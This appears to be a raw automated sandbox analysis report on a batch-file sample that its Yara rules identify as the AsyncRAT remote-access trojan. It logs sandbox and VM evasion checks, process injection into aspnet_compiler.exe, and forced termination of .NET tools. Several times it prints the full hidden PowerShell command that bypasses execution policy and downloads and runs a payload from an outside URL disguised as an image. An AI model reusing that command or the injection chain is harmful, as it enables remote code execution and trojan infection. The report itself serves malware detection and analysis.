                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: powershell.exe, 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: CC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 10C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4461Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5335Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2402Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 9731Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 2402 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044Thread sleep count: 138 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736Thread sleep count: 255 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736Thread sleep time: -255000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736Thread sleep count: 9731 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5736Thread sleep time: -9731000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: aspnet_compiler.exe, 00000015.00000002.3895569228.0000000000D86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                      Source: aspnet_compiler.exe, 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: powershell.exe, 00000004.00000002.2022616873.000002E7E2ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: aspnet_compiler.exe, 00000015.00000002.3895569228.0000000000D08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000004.00000002.2018457002.000002E7E2CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell decode and execute
                      Source: Yara matchFile source: amsi64_2216.amsi.csv, type: OTHER
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 412000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 414000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 986008Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /FJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /FJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"Jump to behavior

                      Language, Device and Operating System Detection

                      barindex
                      Yara detected Obfuscated Powershell
                      Source: Yara matchFile source: Pe4905VGl1.bat, type: SAMPLE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
